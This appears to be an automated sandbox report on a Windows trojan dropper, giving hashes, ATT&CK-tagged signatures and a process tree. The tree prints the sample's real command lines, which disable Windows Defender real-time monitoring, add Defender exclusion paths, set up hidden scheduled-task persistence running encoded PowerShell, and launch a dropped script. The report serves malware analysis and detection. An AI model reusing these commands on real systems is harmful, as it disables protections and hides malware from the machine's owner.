a7687edb79118cb1284b826c025d0c38518bb830348e9c689d09eed113b699ed

Analysis

max time kernel
147s
max time network
141s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
07/02/2023, 07:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1468ab21bdf72abfa6604a4ea40495c1a8e3f9987340c5c625a4a4c4d92cdb73.exe
Size

7.3MB
MD5

5c31ad3aad84d1b16c0e4a9d5279d786
SHA1

d1e49ac8dbebdeaa3bca3bfe1a39a6e429e6ae0e
SHA256

1468ab21bdf72abfa6604a4ea40495c1a8e3f9987340c5c625a4a4c4d92cdb73
SHA512

0b73686e42d65c0bd6972d38e7d3f26d3f99fbe5068fecb928734050c748254726df03ffbb0a30ab2657bcf9175dc96c8eb59130c5e0683b7bd841c10717cd5c
SSDEEP

196608:91OW7Ca1xV6yQMyGDoSdkMZNg7s7bp1UHWy72Wm6ius3uu:3OUkGHdkOuo7bct7Ofeu

Score

10^/10

evasion trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Windows security bypass 2 TTPs 36 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\wTHZGoGtwuowC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\xwiCkKCHPXXuRVyr = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LHMGrUBOU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PavkDjKbXFgU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\rZOVuIkCsmUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LHMGrUBOU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\devOroyvUrBUIbFbXZR = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\devOroyvUrBUIbFbXZR = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\wTHZGoGtwuowC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\TdllXGLLpVAZJFVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\xwiCkKCHPXXuRVyr = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\TdllXGLLpVAZJFVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PavkDjKbXFgU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\XZEiUWOzhrytihVnc = "0"	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\XZEiUWOzhrytihVnc = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\xwiCkKCHPXXuRVyr = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\xwiCkKCHPXXuRVyr = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\rZOVuIkCsmUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe

Checks BIOS information in registry 2 TTPs 1 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Executes dropped EXE 3 IoCs

pid	Process
960	Install.exe
1768	Install.exe
832	XLGeMsP.exe

Loads dropped DLL 8 IoCs

pid	Process
772	1468ab21bdf72abfa6604a4ea40495c1a8e3f9987340c5c625a4a4c4d92cdb73.exe
960	Install.exe
960	Install.exe
960	Install.exe
960	Install.exe
1768	Install.exe
1768	Install.exe
1768	Install.exe

Drops file in System32 directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	XLGeMsP.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	XLGeMsP.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	XLGeMsP.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\brWVyUAguymtAdAIeJ.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1340	schtasks.exe
1184	schtasks.exe
1260	schtasks.exe
1876	schtasks.exe
704	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 9 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings	wscript.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
1132	powershell.EXE
1132	powershell.EXE
1132	powershell.EXE
672	powershell.EXE
672	powershell.EXE
672	powershell.EXE
1676	powershell.EXE
1676	powershell.EXE
1676	powershell.EXE
2024	powershell.EXE
2024	powershell.EXE
2024	powershell.EXE

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1132	powershell.EXE
Token: SeDebugPrivilege	672	powershell.EXE
Token: SeDebugPrivilege	1676	powershell.EXE
Token: SeDebugPrivilege	2024	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 772 wrote to memory of 960	772	1468ab21bdf72abfa6604a4ea40495c1a8e3f9987340c5c625a4a4c4d92cdb73.exe	28
PID 772 wrote to memory of 960	772	1468ab21bdf72abfa6604a4ea40495c1a8e3f9987340c5c625a4a4c4d92cdb73.exe	28
PID 772 wrote to memory of 960	772	1468ab21bdf72abfa6604a4ea40495c1a8e3f9987340c5c625a4a4c4d92cdb73.exe	28
PID 772 wrote to memory of 960	772	1468ab21bdf72abfa6604a4ea40495c1a8e3f9987340c5c625a4a4c4d92cdb73.exe	28
PID 772 wrote to memory of 960	772	1468ab21bdf72abfa6604a4ea40495c1a8e3f9987340c5c625a4a4c4d92cdb73.exe	28
PID 772 wrote to memory of 960	772	1468ab21bdf72abfa6604a4ea40495c1a8e3f9987340c5c625a4a4c4d92cdb73.exe	28
PID 772 wrote to memory of 960	772	1468ab21bdf72abfa6604a4ea40495c1a8e3f9987340c5c625a4a4c4d92cdb73.exe	28
PID 960 wrote to memory of 1768	960	Install.exe	29
PID 960 wrote to memory of 1768	960	Install.exe	29
PID 960 wrote to memory of 1768	960	Install.exe	29
PID 960 wrote to memory of 1768	960	Install.exe	29
PID 960 wrote to memory of 1768	960	Install.exe	29
PID 960 wrote to memory of 1768	960	Install.exe	29
PID 960 wrote to memory of 1768	960	Install.exe	29
PID 1768 wrote to memory of 2044	1768	Install.exe	31
PID 1768 wrote to memory of 2044	1768	Install.exe	31
PID 1768 wrote to memory of 2044	1768	Install.exe	31
PID 1768 wrote to memory of 2044	1768	Install.exe	31
PID 1768 wrote to memory of 2044	1768	Install.exe	31
PID 1768 wrote to memory of 2044	1768	Install.exe	31
PID 1768 wrote to memory of 2044	1768	Install.exe	31
PID 1768 wrote to memory of 108	1768	Install.exe	33
PID 1768 wrote to memory of 108	1768	Install.exe	33
PID 1768 wrote to memory of 108	1768	Install.exe	33
PID 1768 wrote to memory of 108	1768	Install.exe	33
PID 1768 wrote to memory of 108	1768	Install.exe	33
PID 1768 wrote to memory of 108	1768	Install.exe	33
PID 1768 wrote to memory of 108	1768	Install.exe	33
PID 2044 wrote to memory of 1932	2044	forfiles.exe	35
PID 2044 wrote to memory of 1932	2044	forfiles.exe	35
PID 2044 wrote to memory of 1932	2044	forfiles.exe	35
PID 2044 wrote to memory of 1932	2044	forfiles.exe	35
PID 2044 wrote to memory of 1932	2044	forfiles.exe	35
PID 2044 wrote to memory of 1932	2044	forfiles.exe	35
PID 2044 wrote to memory of 1932	2044	forfiles.exe	35
PID 108 wrote to memory of 1560	108	forfiles.exe	36
PID 108 wrote to memory of 1560	108	forfiles.exe	36
PID 108 wrote to memory of 1560	108	forfiles.exe	36
PID 108 wrote to memory of 1560	108	forfiles.exe	36
PID 108 wrote to memory of 1560	108	forfiles.exe	36
PID 108 wrote to memory of 1560	108	forfiles.exe	36
PID 108 wrote to memory of 1560	108	forfiles.exe	36
PID 1932 wrote to memory of 1484	1932	cmd.exe	37
PID 1932 wrote to memory of 1484	1932	cmd.exe	37
PID 1932 wrote to memory of 1484	1932	cmd.exe	37
PID 1932 wrote to memory of 1484	1932	cmd.exe	37
PID 1932 wrote to memory of 1484	1932	cmd.exe	37
PID 1932 wrote to memory of 1484	1932	cmd.exe	37
PID 1932 wrote to memory of 1484	1932	cmd.exe	37
PID 1560 wrote to memory of 1672	1560	cmd.exe	38
PID 1560 wrote to memory of 1672	1560	cmd.exe	38
PID 1560 wrote to memory of 1672	1560	cmd.exe	38
PID 1560 wrote to memory of 1672	1560	cmd.exe	38
PID 1560 wrote to memory of 1672	1560	cmd.exe	38
PID 1560 wrote to memory of 1672	1560	cmd.exe	38
PID 1560 wrote to memory of 1672	1560	cmd.exe	38
PID 1932 wrote to memory of 860	1932	cmd.exe	39
PID 1932 wrote to memory of 860	1932	cmd.exe	39
PID 1932 wrote to memory of 860	1932	cmd.exe	39
PID 1932 wrote to memory of 860	1932	cmd.exe	39
PID 1932 wrote to memory of 860	1932	cmd.exe	39
PID 1932 wrote to memory of 860	1932	cmd.exe	39
PID 1932 wrote to memory of 860	1932	cmd.exe	39
PID 1560 wrote to memory of 1660	1560	cmd.exe	40

C:\Users\Admin\AppData\Local\Temp\1468ab21bdf72abfa6604a4ea40495c1a8e3f9987340c5c625a4a4c4d92cdb73.exe
"C:\Users\Admin\AppData\Local\Temp\1468ab21bdf72abfa6604a4ea40495c1a8e3f9987340c5c625a4a4c4d92cdb73.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:772
- C:\Users\Admin\AppData\Local\Temp\7zSFFD3.tmp\Install.exe
  .\Install.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:960
- - C:\Users\Admin\AppData\Local\Temp\7zSBD4.tmp\Install.exe
    .\Install.exe /S /site_id "525403"
    3⤵
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Enumerates system info in registry
    - Suspicious use of WriteProcessMemory
    PID:1768
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2044
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1932
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        6⤵
        
        PID:1484
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        6⤵
        
        PID:860
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:108
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1560
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        6⤵
        
        PID:1672
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        6⤵
        
        PID:1660
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "gzbiGUoTA" /SC once /ST 06:01:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
      4⤵
      Creates scheduled task(s)
      PID:1876
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /run /I /tn "gzbiGUoTA"
      4⤵
      PID:672
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "gzbiGUoTA"
      4⤵
      PID:548
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "brWVyUAguymtAdAIeJ" /SC once /ST 08:15:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\XZEiUWOzhrytihVnc\rNXQphnMJDXqobV\XLGeMsP.exe\" 2o /site_id 525403 /S" /V1 /F
      4⤵
      Drops file in Windows directory
      Creates scheduled task(s)
      PID:704

C:\Windows\system32\taskeng.exe
taskeng.exe {E577D1F4-7CC0-4FC6-B14F-A4923BC1D9FF} S-1-5-21-3406023954-474543476-3319432036-1000:VUIIVLGQ\Admin:Interactive:[1]
1⤵
PID:1480
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1132
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2008
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:672
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1564
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1676
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1680
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2024
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1824

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1844

C:\Windows\system32\taskeng.exe
taskeng.exe {8B89D77C-2379-4C43-8C55-4789AB3E4C02} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1932
- C:\Users\Admin\AppData\Local\Temp\XZEiUWOzhrytihVnc\rNXQphnMJDXqobV\XLGeMsP.exe
  C:\Users\Admin\AppData\Local\Temp\XZEiUWOzhrytihVnc\rNXQphnMJDXqobV\XLGeMsP.exe 2o /site_id 525403 /S
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:832
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gzkeQYwhS" /SC once /ST 04:59:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:1340
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gzkeQYwhS"
    3⤵
    PID:1876
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gzkeQYwhS"
    3⤵
    PID:304
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    PID:1968
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:2008
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    PID:1744
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:1948
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gzYztJhfI" /SC once /ST 04:50:22 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:1184
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gzYztJhfI"
    3⤵
    PID:1640
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gzYztJhfI"
    3⤵
    PID:1264
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xwiCkKCHPXXuRVyr" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:840
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xwiCkKCHPXXuRVyr" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1756
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xwiCkKCHPXXuRVyr" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1436
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xwiCkKCHPXXuRVyr" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1516
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xwiCkKCHPXXuRVyr" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1004
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xwiCkKCHPXXuRVyr" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1888
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xwiCkKCHPXXuRVyr" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:976
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xwiCkKCHPXXuRVyr" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:964
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C copy nul "C:\Windows\Temp\xwiCkKCHPXXuRVyr\quxUDSDC\uXnngrUaSOyRvjBX.wsf"
    3⤵
    PID:1540
- - C:\Windows\SysWOW64\wscript.exe
    wscript "C:\Windows\Temp\xwiCkKCHPXXuRVyr\quxUDSDC\uXnngrUaSOyRvjBX.wsf"
    3⤵
    - Modifies data under HKEY_USERS
    PID:1968
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LHMGrUBOU" /t REG_DWORD /d 0 /reg:32
      4⤵
